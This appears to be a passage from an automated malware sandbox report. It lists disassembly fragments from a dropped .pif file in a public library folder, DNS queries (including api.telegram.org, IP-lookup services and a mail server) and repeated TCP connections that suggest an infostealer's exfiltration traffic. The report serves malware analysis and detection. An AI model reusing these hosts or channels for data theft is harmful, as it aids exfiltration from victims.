Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	13_2_212977E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	15_2_2D3CDD08
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 305FF2B5h	15_2_305FF0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 305FFC3Fh	15_2_305FF0C9
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 305FE0C5h	15_2_305FE114
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	15_2_305FE5E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 305FE0C5h	15_2_305FDF07
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BF0A1h	15_2_317BEDF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317B185Dh	15_2_317B1440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317B10E9h	15_2_317B0E38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BE7F1h	15_2_317BE548
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BBC81h	15_2_317BB9D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BEC49h	15_2_317BE9A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BB829h	15_2_317BB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BDAE9h	15_2_317BD840
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317B185Dh	15_2_317B1431
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BE399h	15_2_317BE0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BDF41h	15_2_317BDC98
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BCDE1h	15_2_317BCB38
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BFDA9h	15_2_317BFB00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BD691h	15_2_317BD3E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BD239h	15_2_317BCF90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317B185Dh	15_2_317B178B
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BF4F9h	15_2_317BF250
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BC0D9h	15_2_317BBE30
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BC989h	15_2_317BC6E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BF951h	15_2_317BF6A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317BC531h	15_2_317BC288
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C68FDh	15_2_317C65C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CEA7Eh	15_2_317CE7B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C7DC0h	15_2_317C7AF0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C5B61h	15_2_317C58B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C701Ah	15_2_317C6F70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C4019h	15_2_317C3D70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CD83Eh	15_2_317CD570
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C6411h	15_2_317C6168
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C701Ah	15_2_317C6F69
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CF82Eh	15_2_317CF560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C0FF1h	15_2_317C0D48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CA60Eh	15_2_317CA340
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CC5FEh	15_2_317CC330
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CE5EEh	15_2_317CE320
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C3BC1h	15_2_317C3918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C5FB9h	15_2_317C5D10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C18A1h	15_2_317C15F8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CFCBEh	15_2_317CF9F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CAA9Eh	15_2_317CA7D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C4471h	15_2_317C41C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CCA8Eh	15_2_317CC7C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C1449h	15_2_317C11A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov esp, ebp	15_2_317C9B90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CB84Eh	15_2_317CB580
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C4D21h	15_2_317C4A78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C3311h	15_2_317C3068
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CAF2Eh	15_2_317CAC60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C5709h	15_2_317C5460
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C1CF9h	15_2_317C1A50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CCF1Eh	15_2_317CCC50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CEF0Eh	15_2_317CEC40
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C02E9h	15_2_317C0040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C48C9h	15_2_317C4620
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CBCDEh	15_2_317CBA10
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CDCCEh	15_2_317CDA00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CB3BEh	15_2_317CB0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C0B99h	15_2_317C08F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CD3AEh	15_2_317CD0E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C517Bh	15_2_317C4ED0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CF39Eh	15_2_317CF0D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C3769h	15_2_317C34C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CA17Eh	15_2_317C9EB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C2151h	15_2_317C1EA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CC16Eh	15_2_317CBEA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317C0741h	15_2_317C0498
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 317CE15Eh	15_2_317CDE90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318352A0h	15_2_31834FA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31834C77h	15_2_31834908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31831E36h	15_2_31831B68
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183AD78h	15_2_3183AA80
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31832756h	15_2_31832488
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183D880h	15_2_3183D588
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31836A88h	15_2_31836790
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31839590h	15_2_31839298
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183C098h	15_2_3183BDA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31833076h	15_2_31832DA8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183EBA0h	15_2_3183E8A8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31837DA8h	15_2_31837AB0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31831086h	15_2_31830DB8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183A8B0h	15_2_3183A5B8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183D3B8h	15_2_3183D0C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31833996h	15_2_318336C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318365C0h	15_2_318362C8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31830777h	15_2_318304D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318390C8h	15_2_31838DD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318319A6h	15_2_318316D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183BBD0h	15_2_3183B8D8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183E6D8h	15_2_3183E3E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318342B6h	15_2_31833FE8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318378E0h	15_2_318375E8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183A3E8h	15_2_3183A0F0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318322C6h	15_2_31831FF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183CEF0h	15_2_3183CBF8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 318360F8h	15_2_31835E00
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183F9F8h	15_2_3183F700
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31838C00h	15_2_31838908
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183B708h	15_2_3183B410
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31832BE6h	15_2_31832918
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183E210h	15_2_3183DF18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31837418h	15_2_31837120
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31830BF6h	15_2_31830928
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31839F20h	15_2_31839C28
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183CA28h	15_2_3183C730
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31833507h	15_2_31833238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31835C30h	15_2_31835938
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183F530h	15_2_3183F238
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183030Eh	15_2_31830040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31838738h	15_2_31838440
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31831516h	15_2_31831248
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183B240h	15_2_3183AF48
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183DD48h	15_2_3183DA50
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31833E26h	15_2_31833B58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31836F50h	15_2_31836C58
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31839A58h	15_2_31839760
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183C560h	15_2_3183C268
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31835768h	15_2_31835470
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 3183F069h	15_2_3183ED70
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31834746h	15_2_31834478
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31838270h	15_2_31837F78
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31860CC8h	15_2_318609D0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31860800h	15_2_31860508
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then jmp 31860338h	15_2_31860040
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	15_2_3187FAD0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	15_2_3187FAD8
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	15_2_31983B64
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	15_2_319877E0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 4x nop then push 00000000h	15_2_319D482F

Source: global traffic	DNS query: name: amazonenviro.com
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org
Source: global traffic	DNS query: name: mail.irco.com.sa

Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49772 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49779 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49792 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49801 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49814 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49827 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49835 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49842 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49858 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49865 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49872 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49878 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49889 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49901 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49908 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49921 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49928 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49935 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49947 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49948 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49961 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49962 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49974 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49976 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49982 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:49994 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50002 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50019 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50031 -> 104.21.80.1:443
Source: global traffic	TCP traffic: 192.168.2.5:50038 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.5:49711 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49758 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49758 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49758 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49785 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49796 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49807 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49820 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49833 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49840 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49847 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49863 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49863 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49863 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49883 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49895 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49906 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49914 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49915 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49915 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49927 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49915 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49941 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49954 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49955 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49968 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49969 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49988 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49996 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:50008 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:50025 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49713 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
Source: global traffic	TCP traffic: 192.168.2.5:49715 -> 166.62.27.188:443
